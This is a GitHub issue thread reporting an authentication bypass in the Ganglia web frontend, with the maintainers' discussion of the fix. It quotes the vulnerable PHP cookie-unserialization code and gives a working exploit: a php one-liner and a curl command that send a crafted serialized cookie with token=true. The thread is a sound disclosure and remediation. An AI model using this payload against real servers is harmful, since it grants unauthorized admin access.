Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Security] auth bypass #267

Closed
d0znpp opened this issue Sep 4, 2015 · 9 comments
Closed

[Security] auth bypass #267

d0znpp opened this issue Sep 4, 2015 · 9 comments

Comments

@d0znpp
Copy link

d0znpp commented Sep 4, 2015

It's easy to bypass auth by using boolean serialization like this:
$ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true)));"

Vulnerable code listed below:

if(isSet($_COOKIE['ganglia_auth'])) {
$cookie = $_COOKIE['ganglia_auth'];
// magic quotes will break unserialization
if($this->getMagicQuotesGpc()) {
$cookie = stripslashes($cookie);
}
$data = unserialize($cookie);
if(array_keys($data) != array('user','group','token')) {
return false;
}
if($this->getAuthToken($data['user']) == $data['token']) {

if(isSet($_COOKIE['ganglia_auth'])) {
  $cookie = $_COOKIE['ganglia_auth'];
  // magic quotes will break unserialization
  if($this->getMagicQuotesGpc()) {
    $cookie = stripslashes($cookie);
  }
  $data = unserialize($cookie);
  if(array_keys($data) != array('user','group','token')) {
    return false;
  }
  if($this->getAuthToken($data['user']) == $data['token']) {

// Found by d90.andrew
// Exploit: curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D' http://ganglia.local/ganglia/

@vvuksan
Copy link
Member

vvuksan commented Sep 4, 2015

Thanks for reporting. We'll look into fixing this shortly cc/ @alexdean

@alexdean
Copy link
Member

alexdean commented Sep 4, 2015

phew. been a while since i was in this code. sounds like strict equality checking would resolve the problem?

if($this->getAuthToken($data['user']) === $data['token']) {

@d0znpp
Copy link
Author

d0znpp commented Sep 7, 2015

Yes. But i'm strongly recommend to replace unserialize() to json_decode().

@zveriu
Copy link

zveriu commented Sep 10, 2015

@Jehops
Copy link

Jehops commented Oct 1, 2015

Is there an ETA for a fix?

@alexdean
Copy link
Member

alexdean commented Oct 1, 2015

I think the fix I mentioned above will be sufficient, but I don't have a dev environment set up to confirm with. I don't think it's likely I'll have time to set one up in the near future.

@vvuksan
Copy link
Member

vvuksan commented Oct 1, 2015

Per d0znpp suggestion I will be changing serialization to use json_encode/decode.

@vvuksan vvuksan closed this as completed in f8cc170 Oct 1, 2015
@vvuksan
Copy link
Member

vvuksan commented Oct 1, 2015

I will try to get a release published by Friday 10/2/2015

@Jehops
Copy link

Jehops commented Oct 2, 2015

FreeBSD port updated.
Thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants